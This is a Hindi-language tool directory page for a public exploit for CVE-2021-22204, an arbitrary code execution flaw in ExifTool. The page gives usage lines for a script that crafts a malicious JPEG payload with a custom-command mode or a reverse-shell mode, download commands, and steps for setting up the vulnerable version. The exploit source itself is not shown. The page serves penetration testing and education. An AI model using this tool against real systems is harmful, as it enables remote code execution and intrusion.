Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
exploit-CVE-2021-22204 — CVE-2021-22204 (ExifTool) के लिए शोषण - मनमाना कोड निष्पादन | Kitploit
उपकरण/GitHubGitHub/unicordev/exploit-cve-2021-22204
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubunicordev/exploit-cve-2021-22204

exploit-CVE-2021-22204

CVE-2021-22204 (ExifTool) के लिए शोषण - मनमाना कोड निष्पादन

रिपॉजिटरी देखें
5361 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

CVE-2021-22204 (ExifTool) का शोषण - मनमाना कोड निष्पादन

GitHub CVE Cover

यह रिपॉजिटरी पसंद है? हमें एक ⭐ दें!

केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए।

शोषण लेखक

@UNICORDev द्वारा (@NicPWNs और @Dev-Yeoj)

भेद्यता विवरण

ExifTool संस्करण 7.44 और उससे ऊपर के DjVu फ़ाइल स्वरूप में उपयोगकर्ता डेटा का अनुचित तटस्थीकरण, दुर्भावनापूर्ण छवि को पार्स करते समय मनमाना कोड निष्पादन की अनुमति देता है।

शोषण विवरण

इस शोषण का उपयोग एक JPEG छवि पेलोड उत्पन्न करने के लिए करें जिसका उपयोग कमजोर ExifTool संस्करण के साथ कोड निष्पादन के लिए किया जा सकता है। एक कस्टम कमांड प्रदान किया जा सकता है या एक रिवर्स शेल उत्पन्न किया जा सकता है। एक JPEG छवि स्वचालित रूप से उत्पन्न होती है, और वैकल्पिक रूप से, पेलोड को सम्मिलित करने के लिए एक कस्टम JPEG छवि प्रदान की जा सकती है।

उपयोग

root@kitploit:~
  python3 exploit-CVE-2021-22204.py -c <command>
  python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port>
  python3 exploit-CVE-2021-22204.py -c <command> [-i <image.jpg>]
  python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port> [-i <image.jpg>]
  python3 exploit-CVE-2021-22204.py -h

विकल्प

root@kitploit:~
  -c    Custom command mode. Provide command to execute.
  -s    Reverse shell mode. Provide local IP and port.
  -i    Path to custom JPEG image. (Optional)
  -h    Show this help menu.

डाउनलोड

GitHub से exploit-CVE-2021-22204.py डाउनलोड करें

ExploitDB से exploit-CVE-2021-22204.py डाउनलोड करें

Searchsploit (ExploitDB)

root@kitploit:~
searchsploit -u
searchsploit -m 50911

शोषण आवश्यकताएँ

  • python3
  • djvulibre-bin
  • exiftool

डेमो

Demo Gif

परीक्षण किया गया

Exiftool संस्करण 12.23

लागू होता है

Exiftool संस्करण 7.44 - 12.23

कमजोर वातावरण

root@kitploit:~
wget https://github.com/exiftool/exiftool/archive/refs/tags/12.23.zip
unzip exiftool-12.23.zip
cd exiftool-12.23
perl Makefile.PL
make test
sudo make install
exiftool -ver

उत्पन्न पेलोड का परीक्षण

root@kitploit:~
exiftool image.jpg

श्रेय

  • https://hackerone.com/reports/1154542
  • https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/
  • https://nvd.nist.gov/vuln/detail/CVE-2021-22204
  • https://app.hackthebox.com/machines/Overflow
  • https://www.exploit-db.com/exploits/50911
टूल डाउनलोड करें